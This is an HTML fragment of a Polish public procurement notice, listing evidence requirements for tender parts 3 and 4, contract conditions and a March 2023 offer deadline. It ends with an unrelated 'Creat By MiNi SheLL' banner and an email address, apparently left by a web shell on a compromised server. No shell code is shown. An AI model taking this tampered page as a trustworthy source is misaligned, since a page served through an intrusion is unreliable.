świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – zał. nr 7 do SWZ. <br/><br/>Dla cz 3<br/><br/>W celu wykazania, że Wykon. spełnia warunek udziału w postępowaniu dotyczący zdolności technicznej:<br/><br/>wykaz dostaw wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – zał. nr 9 do SWZ. <br/><br/>Dla cz. 4<br/><br/>W celu wykazania, że Wykon. spełnia warunek udziału w postępowaniu dotyczący zdolności zawodowej:<br/><br/>wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zał. nr 8 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> opisane w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały określone w załącznikach do SWZ stanowiących wzory umów dla każdej części - 1.3 oraz 2.3 a także 3.2 i 4.2 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Smart PZP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-15 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-13</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com